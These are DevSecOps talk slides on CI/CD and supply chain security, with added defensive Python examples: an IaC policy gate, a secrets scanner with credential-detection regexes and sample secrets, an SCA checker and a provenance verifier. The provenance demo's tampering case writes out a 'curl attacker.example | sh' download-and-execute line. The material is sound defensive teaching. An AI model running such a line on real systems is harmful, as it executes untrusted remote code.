Who Am I

* Having experience in Application Security, Source Code Review, Mobile Security, Risk Assessment
* Completed various certifications like CISM, MCNA, Solution Architect (AWS), ISO 27001 (Lead Auditor), CEH
* Active speaker at NULL Chennai, OWASP Chennai
* Project Advisor for many colleges
Introduction to DevSecOps

* DevSecOps integrates security into DevOps so that security is part of every stage of the software development lifecycle.
* The shift-left security approach brings security practices earlier in the development process, reducing vulnerabilities before they reach production.
* Automation of security testing enables continuous monitoring and enforcement of security without slowing down CI/CD pipelines.
* Collaboration between development, security, and operations teams makes security a shared responsibility across all stakeholders.
* Fosters a culture of security by embedding security practices in the workflow, reducing the risk of vulnerabilities and breaches.
Agile Development

(Diagram: Agile Development -> Continuous Integration -> Continuous Delivery -> DevOps.)

DevOps Integration
Key Security Challenges in CI/CD

1. Vulnerabilities in third-party dependencies can introduce security risks in the software.
2. Misconfigured infrastructure as code (IaC) leads to weak security in cloud and on-prem environments.
3. Insufficient automated security testing causes vulnerabilities to go undetected during development.
4. Insecure secrets management can expose sensitive credentials like API keys and passwords.
5. Unvalidated open-source components may contain hidden or known vulnerabilities.
6. Inadequate access controls in CI/CD tools can lead to unauthorized code changes.
7. Inconsistent patch management delays fixes for known vulnerabilities in deployed environments.
8. Lack of real-time security monitoring leads to delayed detection of security incidents.
9. Weak container security leaves containerized applications exposed to threats.
10. No governance over CI/CD pipeline configurations results in non-compliant workflows and risky deployments.
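Challenge 2 (misconfigured IaC) is the kind of problem a pipeline can catch mechanically before `terraform apply` ever runs. The block below is an added example, not code from the talk or from any tool it names: it reads the JSON that `terraform show -json` emits for a saved plan and applies three illustrative rules (world-readable S3 ACL, security-group ingress from 0.0.0.0/0 to an admin port, unencrypted EBS volume). The plan it evaluates is a constructed sample embedded in the block; the rule set and the exit-code convention are assumptions for illustration, not the page's.

```python
"""Policy checks over a Terraform plan exported as JSON (terraform show -json plan.out).

Added example, not from the talk. The plan below is constructed so the block runs
offline, and the three rules are an illustrative subset, not a complete ruleset.
"""
import ipaddress
import json
import sys
from typing import Callable, Dict, Iterator, List

# Constructed sample plan: three misconfigured resources and one acceptable one.
SAMPLE_PLAN_JSON = json.dumps({
    "planned_values": {"root_module": {"resources": [
        {"address": "aws_s3_bucket.logs", "type": "aws_s3_bucket",
         "values": {"bucket": "team-logs", "acl": "public-read"}},
        {"address": "aws_security_group.bastion", "type": "aws_security_group",
         "values": {"ingress": [
             {"from_port": 22, "to_port": 22, "protocol": "tcp",
              "cidr_blocks": ["0.0.0.0/0"], "ipv6_cidr_blocks": []},
             {"from_port": 443, "to_port": 443, "protocol": "tcp",
              "cidr_blocks": ["10.0.0.0/8"], "ipv6_cidr_blocks": []}]}},
        {"address": "aws_ebs_volume.data", "type": "aws_ebs_volume",
         "values": {"size": 100, "encrypted": False}},
        {"address": "aws_ebs_volume.ok", "type": "aws_ebs_volume",
         "values": {"size": 20, "encrypted": True}},
    ]}}
})

ADMIN_PORTS = {22, 3389}  # SSH and RDP: never reachable from the whole internet


def _iter_resources(module: dict) -> Iterator[dict]:
    """Walk a plan module and every nested child module."""
    yield from module.get("resources", [])
    for child in module.get("child_modules", []):
        yield from _iter_resources(child)


def _open_to_world(cidrs: List[str]) -> bool:
    """True if any CIDR is a /0, i.e. 0.0.0.0/0 or ::/0."""
    return any(ipaddress.ip_network(c, strict=False).prefixlen == 0 for c in cidrs)


def check_s3_bucket(res: dict) -> List[str]:
    acl = res["values"].get("acl") or "private"
    if acl.startswith("public"):
        return [f"{res['address']}: ACL '{acl}' makes the bucket world-readable"]
    return []


def check_security_group(res: dict) -> List[str]:
    findings = []
    for rule in res["values"].get("ingress") or []:
        cidrs = (rule.get("cidr_blocks") or []) + (rule.get("ipv6_cidr_blocks") or [])
        if not _open_to_world(cidrs):
            continue
        lo, hi = rule.get("from_port", 0), rule.get("to_port", 0)
        all_traffic = rule.get("protocol") == "-1" or (lo == 0 and hi == 0)
        exposed = sorted(p for p in ADMIN_PORTS if lo <= p <= hi)
        if all_traffic or exposed:
            what = "all traffic" if all_traffic else f"port(s) {exposed}"
            findings.append(f"{res['address']}: ingress exposes {what} to the internet")
    return findings


def check_ebs_volume(res: dict) -> List[str]:
    if not res["values"].get("encrypted", False):
        return [f"{res['address']}: volume is not encrypted at rest"]
    return []


CHECKS: Dict[str, Callable[[dict], List[str]]] = {
    "aws_s3_bucket": check_s3_bucket,
    "aws_security_group": check_security_group,
    "aws_ebs_volume": check_ebs_volume,
}


def evaluate_plan(plan_json: str) -> List[str]:
    """Return one finding string per violated rule; an empty list means the plan passes."""
    plan = json.loads(plan_json)
    root = plan.get("planned_values", {}).get("root_module", {})
    findings: List[str] = []
    for res in _iter_resources(root):
        check = CHECKS.get(res.get("type", ""))
        if check:
            findings.extend(check(res))
    return findings


if __name__ == "__main__":
    # CI gate: a non-zero exit fails the stage before `terraform apply` runs.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PLAN_JSON
    results = evaluate_plan(text)
    for finding in results:
        print("FAIL", finding)
    sys.exit(1 if results else 0)
```

Run it against a real plan with `terraform plan -out plan.out && terraform show -json plan.out > plan.json && python iac_gate.py plan.json`. Evaluating the plan rather than the `.tf` source means module-supplied defaults and variable values are already resolved, which is why the check walks `child_modules` as well as the root module.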


Automation Tools for Securing CI/CD

* SAST/DAST Tools: SonarQube, Veracode, etc.
* Container Security: Docker, Aqua Security.
* IaC Security: Terraform, AWS Config.
* Secrets Management: HashiCorp Vault, AWS Secrets Manager.
* CI/CD Pipeline Tools: Jenkins, GitLab CI, CircleCI.
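The Secrets Management line above is about where credentials should live; the complementary shift-left control is a gate that refuses to let a hard-coded credential into the repository in the first place (the "hardcoded secrets" scenario under Real World attack scenarios later in this deck). The block below is an added example, not from the talk or from any listed tool: it combines vendor-specific token formats, a keyword-assignment rule with a placeholder allowlist, and a Shannon-entropy fallback, and returns findings with the value masked so the gate's own log does not leak the secret. The sample source is constructed; the AWS key in it is Amazon's published documentation example value, and the rule names and thresholds are assumptions for illustration.

```python
"""Shift-left secrets gate: scan source text for credentials before it reaches the repo.

Added example, not from the talk. The rules are a small illustrative subset (real
scanners ship hundreds), the sample source is constructed, and the AWS key in it is
Amazon's published documentation example value, not a live credential.
"""
import math
import re
import sys
from typing import List, NamedTuple


class Finding(NamedTuple):
    line_no: int
    rule: str
    evidence: str  # masked value, safe to print in CI logs


# Vendor-specific formats: precise enough to report unconditionally.
VENDOR_RULES = [
    ("aws-access-key-id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("github-pat", re.compile(r"\bghp_[A-Za-z0-9]{36}\b")),
    ("private-key-block", re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----")),
]
# Generic rule: <secret-ish name> = "<literal>" (also matches JSON/YAML "name": "value").
KEYWORD_RULE = re.compile(
    r"""(?i)(?:api[_-]?key|secret|passw(?:or)?d|token)["']?\s*[:=]\s*["']([^"']{4,})["']""")
# Any long quoted token drawn from a base64/hex-like alphabet.
QUOTED_BLOB = re.compile(r"""["']([A-Za-z0-9+/=_\-]{20,})["']""")
# Placeholders that are not secrets: ${VAR}, $VAR, <value>, changeme, xxxx ...
PLACEHOLDER = re.compile(r"(?i)^(?:\$\{?[A-Z0-9_]+\}?|<[^>]+>|changeme|example|dummy|placeholder|x+)$")
ENTROPY_THRESHOLD = 3.5  # bits per character; prose and identifiers sit around 2 to 3

# Constructed sample file: lines 2, 3, 6 and 7 should be reported, the rest should not.
SAMPLE_SOURCE = """\
import os
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
DB_PASSWORD = "hunter2"
API_TOKEN = "${API_TOKEN}"
SLACK_TOKEN = os.environ["SLACK_TOKEN"]
config = {"secret": "s3cr3t-d3v-0nly-p4ssw0rd-8Zq1"}
signing_blob = "Zk9pQ2xvdWRTM2NyM3RLZXlWYWx1ZQ=="
VERSION = "1.2.3"
"""


def shannon_entropy(s: str) -> float:
    """Bits per character of the string's own symbol distribution."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def mask(value: str) -> str:
    """Keep just enough of the value to locate it; never echo a full secret."""
    return value[:4] + "..." + value[-2:] if len(value) > 8 else "***"


def scan_text(text: str) -> List[Finding]:
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        matched = False
        for name, pattern in VENDOR_RULES:
            for m in pattern.finditer(line):
                findings.append(Finding(line_no, name, mask(m.group(0))))
                matched = True
        m = KEYWORD_RULE.search(line)
        if m and not PLACEHOLDER.match(m.group(1)):
            findings.append(Finding(line_no, "keyword-assignment", mask(m.group(1))))
            matched = True
        if matched:
            continue  # entropy is only a fallback for secrets the named rules miss
        for m in QUOTED_BLOB.finditer(line):
            value = m.group(1)
            if not PLACEHOLDER.match(value) and shannon_entropy(value) >= ENTROPY_THRESHOLD:
                findings.append(Finding(line_no, "high-entropy-string", mask(value)))
    return findings


if __name__ == "__main__":
    # Pre-commit or CI usage: python secrets_gate.py <file> ...; no arguments scans the sample.
    hits = []
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as fh:
            hits += [(path, f) for f in scan_text(fh.read())]
    if not sys.argv[1:]:
        hits = [("<sample>", f) for f in scan_text(SAMPLE_SOURCE)]
    for path, f in hits:
        print(f"{path}:{f.line_no}: {f.rule} ({f.evidence})")
    sys.exit(1 if hits else 0)
```

Wire it as a pre-commit hook and again as the first CI job so a secret is blocked on the developer's machine and, failing that, before the pipeline can use it. The entropy rule is deliberately the last resort: on its own it produces noise on hashes and test fixtures, so the named rules take precedence and the allowlist keeps `${VAR}` references from being reported.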
SDLC and SSDLC

* SDLC (Software Development Lifecycle)
  * Structured process to develop and maintain high-quality software products.
  * Key phases:
    * Requirements
    * Design
    * Development
    * Testing
    * Deployment
    * Maintenance

* SSDLC (Secure Software Development Lifecycle)
  * Incorporate security requirements into the dev scope.
  * Secure Design Review and Threat Modeling.
  * Secure coding practices (SAST, IaC, CI/CD Security and SCA) and Code Review.
  * Security Testing (RASP and DAST).
  * Continuous Monitoring and Assessments.

Introduction to software supply chain

Encompasses all the code, components, libraries, dependencies, tools, processes, and people involved in developing, building, and publishing a software artifact.

SCA vs Supply chain security:
* SCA covers only the dependencies involved in the code, whereas
* software supply chain security involves securing CI/CD pipelines, build artifacts, your IDE, version control and everything else involved in making the software.
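SCA in the sense just described, as an added example that is not from the talk: match each pinned dependency in a manifest against advisory version ranges and report the ones that fall inside an affected range. The manifest is constructed. The two advisories are published ones (CVE-2023-32681 for requests, CVE-2020-14343 for PyYAML) with their affected ranges written in OSV's introduced/fixed form; the advisory table being embedded in the block, rather than fetched from OSV or NVD, and the omission of transitive dependencies are simplifications for illustration.

```python
"""Software Composition Analysis over a pinned manifest: match pins against advisory ranges.

Added example, not from the talk. The manifest and the advisory table are embedded
so the block runs offline; a real SCA tool pulls advisories from OSV/NVD/GitHub and
walks transitive dependencies from a lock file rather than a hand-written list.
"""
import re
from typing import Dict, List, NamedTuple, Optional, Tuple

Version = Tuple[int, ...]


class Advisory(NamedTuple):
    ident: str
    package: str               # normalised name (PEP 503 style)
    introduced: Optional[str]  # None: affected since the first release
    fixed: Optional[str]       # None: no fixed release yet
    summary: str


# Hand-built excerpt of two published advisories, ranges in OSV's introduced/fixed form.
ADVISORIES = [
    Advisory("CVE-2023-32681", "requests", "2.3.0", "2.31.0",
             "Proxy-Authorization header leaked to the destination host on redirect"),
    Advisory("CVE-2020-14343", "pyyaml", None, "5.4",
             "full_load() permits arbitrary code execution via python/object tags"),
]

# Constructed requirements.txt: two vulnerable pins, one clean pin.
SAMPLE_REQUIREMENTS = """\
# runtime dependencies
requests==2.28.2
PyYAML==5.3.1
urllib3==2.2.1   # pinned for reproducible builds
"""

PIN = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*==\s*([^\s;#]+)")


def normalise_name(name: str) -> str:
    """PEP 503: case-insensitive, runs of -, _ and . are equivalent."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_version(v: str) -> Version:
    """Release segment only (1.2.3 -> (1, 2, 3)); trailing zeros dropped so 5.4.0 == 5.4.
    Pre/post/dev labels are ignored, which is enough for pinned release versions."""
    m = re.match(r"^\s*v?(\d+(?:\.\d+)*)", v)
    if not m:
        raise ValueError(f"unparseable version: {v!r}")
    parts = [int(p) for p in m.group(1).split(".")]
    while len(parts) > 1 and parts[-1] == 0:
        parts.pop()
    return tuple(parts)


def parse_requirements(text: str) -> Dict[str, str]:
    """Return {normalised name: pinned version}; comments and unpinned lines are ignored."""
    pins: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue
        m = PIN.match(line)
        if m:
            pins[normalise_name(m.group(1))] = m.group(2)
    return pins


def is_affected(version: Version, adv: Advisory) -> bool:
    after_intro = adv.introduced is None or version >= parse_version(adv.introduced)
    before_fix = adv.fixed is None or version < parse_version(adv.fixed)
    return after_intro and before_fix


def audit(requirements_text: str) -> List[dict]:
    """One finding per (package, advisory) pair whose pinned version lies in the affected range."""
    findings = []
    for name, pinned in parse_requirements(requirements_text).items():
        version = parse_version(pinned)
        for adv in ADVISORIES:
            if adv.package == name and is_affected(version, adv):
                findings.append({"package": name, "version": pinned, "ident": adv.ident,
                                 "fixed": adv.fixed, "summary": adv.summary})
    return sorted(findings, key=lambda f: (f["package"], f["ident"]))


if __name__ == "__main__":
    for f in audit(SAMPLE_REQUIREMENTS):
        print(f"{f['package']}=={f['version']}: {f['ident']} (fix: upgrade to {f['fixed']})")
```

Two details matter more than they look: name normalisation, because `PyYAML`, `pyyaml` and `py-yaml` are the same package to the index and an advisory keyed on one spelling must still hit the others; and the half-open range `introduced <= v < fixed`, which is why the first release carrying the fix is not reported.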


Automotive Supply chain vs Software Supply Chain:

* Major in-house produced components like engines and transmissions (in-house code)
* Third-party components like door handles, brake lights, and wiper blades (third-party dependencies)
* The manufacturing facilities, machinery, and tooling used to assemble the car (CI/CD pipelines)
* The workers working in the production facility (people involved)

(Diagram: engineers -> build systems / repository -> network -> application -> deployed systems.)


Understanding software supply chain vulnerabilities

* Weaknesses or flaws that exist within the processes or tools involved in developing, integrating and delivering software can be exploited by attackers.
* Vulnerabilities can lead to a breach, which in turn leads to distribution of compromised software to downstream customers.
* Vulnerabilities can emerge at any stage of the SDLC, and reliance on external vendors and contractors heightens the risk of attacks.
Real World attack scenarios

Developers:
* Hardcoded secrets.
* Insecure proprietary code.
* Compromised source control systems.
* Code tampering, including the insertion of malicious code.
* Insider threats.

Build Automation:
* Misconfigured systems.
* Compromised CI/CD pipelines.
* Commercial third-party software or open-source software vulnerabilities.
* Undermined code signing.
* IaC misconfigurations.

Wider threat:
* Vulnerabilities or misconfigurations in running software.

Best Practices:
* Controlled shift-left and shift-right strategies.
* Using software supply chain frameworks and tools such as NIST, MITRE ATT&CK, SLSA, Sigstore, S2C2F etc., to secure the builds.
* Building a strong security culture within the organization.
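"Undermined code signing" in the Build Automation column and SLSA/Sigstore in the Best Practices column are two sides of the same control: the build records what it produced and from what, signs that record, and the deploy step refuses anything whose digest, signature or builder does not check out. The block below is an added example, not from the talk or from any of the named projects. The statement follows the in-toto/SLSA provenance shape (subject digest, builder id, source commit), but the signer is HMAC-SHA256 from the standard library, a stand-in so the block runs offline; Sigstore and cosign use asymmetric signatures with short-lived keys bound to a CI identity and a transparency log. The builder id, repository URL, commit, key and artifact bytes are all constructed placeholders.

```python
"""Attested build: record provenance for an artifact, sign it, verify it before deploy.

Added example, not from the talk. The statement mirrors the in-toto/SLSA provenance
shape (subject digest, builder id, source commit), but the signer is HMAC-SHA256
from the standard library, a stand-in so the block runs offline; Sigstore/cosign use
asymmetric signatures with short-lived keys and a transparency log. The builder id,
repository URL, commit and key are constructed placeholders.
"""
import hashlib
import hmac
import json
from typing import Dict, Optional

ARTIFACT = b"#!/bin/sh\necho 'deploying service v1.4.2'\n"         # constructed build output
SIGNING_KEY = b"ci-signing-key-demo-only"                            # placeholder secret
BUILDER = "https://ci.example.internal/builders/gitlab-runner@v1"  # placeholder builder id
TRUSTED_BUILDERS = {BUILDER}                                         # policy: who may build for prod


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def canonical(obj: Dict) -> bytes:
    """Deterministic JSON so signer and verifier MAC identical bytes."""
    return json.dumps(obj, sort_keys=True, separators=(",", ":")).encode()


def make_provenance(artifact: bytes, name: str, builder_id: str, repo: str, commit: str) -> Dict:
    return {
        "_type": "https://in-toto.io/Statement/v1",
        "subject": [{"name": name, "digest": {"sha256": sha256_hex(artifact)}}],
        "predicateType": "https://slsa.dev/provenance/v1",
        "predicate": {
            "buildDefinition": {"resolvedDependencies": [{"uri": repo, "digest": {"gitCommit": commit}}]},
            "runDetails": {"builder": {"id": builder_id}},
        },
    }


def sign(statement: Dict, key: bytes) -> Dict[str, str]:
    payload = canonical(statement)
    return {"payload": payload.decode(), "signature": hmac.new(key, payload, hashlib.sha256).hexdigest()}


def verify(envelope: Dict[str, str], artifact: bytes, key: bytes) -> Optional[str]:
    """None means deploy may proceed; otherwise the reason the artifact is refused."""
    payload = envelope["payload"].encode()
    expected = hmac.new(key, payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, envelope["signature"]):
        return "signature does not verify: provenance was altered or signed with another key"
    statement = json.loads(payload)
    builder = statement["predicate"]["runDetails"]["builder"]["id"]
    if builder not in TRUSTED_BUILDERS:
        return f"untrusted builder {builder}: not produced by the hardened CI"
    subject_digests = {s["digest"]["sha256"] for s in statement["subject"]}
    if sha256_hex(artifact) not in subject_digests:
        return "artifact digest not in provenance subject: artifact changed after the build"
    return None


def demo() -> Dict[str, Optional[str]]:
    """Genuine release plus three tampering scenarios; values are verify()'s verdicts."""
    repo, commit = "https://git.example.internal/app.git", "0123456789abcdef0123456789abcdef01234567"
    envelope = sign(make_provenance(ARTIFACT, "deploy.sh", BUILDER, repo, commit), SIGNING_KEY)
    # 1. Artifact swapped after signing (on the registry or in transit).
    tampered = ARTIFACT.replace(b"echo", b"curl http://attacker.example/x | sh; echo")
    # 2. Provenance edited to claim a different builder; the MAC no longer matches.
    edited = dict(envelope, payload=envelope["payload"].replace(BUILDER, "https://laptop.example/build"))
    # 3. Correctly signed, but built outside the trusted pipeline.
    rogue = sign(make_provenance(ARTIFACT, "deploy.sh", "https://laptop.example/build", repo, commit),
                 SIGNING_KEY)
    return {
        "genuine": verify(envelope, ARTIFACT, SIGNING_KEY),
        "tampered_artifact": verify(envelope, tampered, SIGNING_KEY),
        "edited_provenance": verify(edited, ARTIFACT, SIGNING_KEY),
        "untrusted_builder": verify(rogue, ARTIFACT, SIGNING_KEY),
    }


if __name__ == "__main__":
    for case, verdict in demo().items():
        print(f"{case}: {'OK to deploy' if verdict is None else 'REFUSED: ' + verdict}")
```

The third scenario is the one a plain signature check misses: a valid signature proves who held the key, not where the build ran, so the verifier also enforces a builder allowlist. With a shared symmetric key that policy is only as good as the key's secrecy; Sigstore's keyless flow closes that gap by binding the CI job's OIDC identity into the signing certificate, which is what the allowlist would then be checked against.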
Vulnerability scanning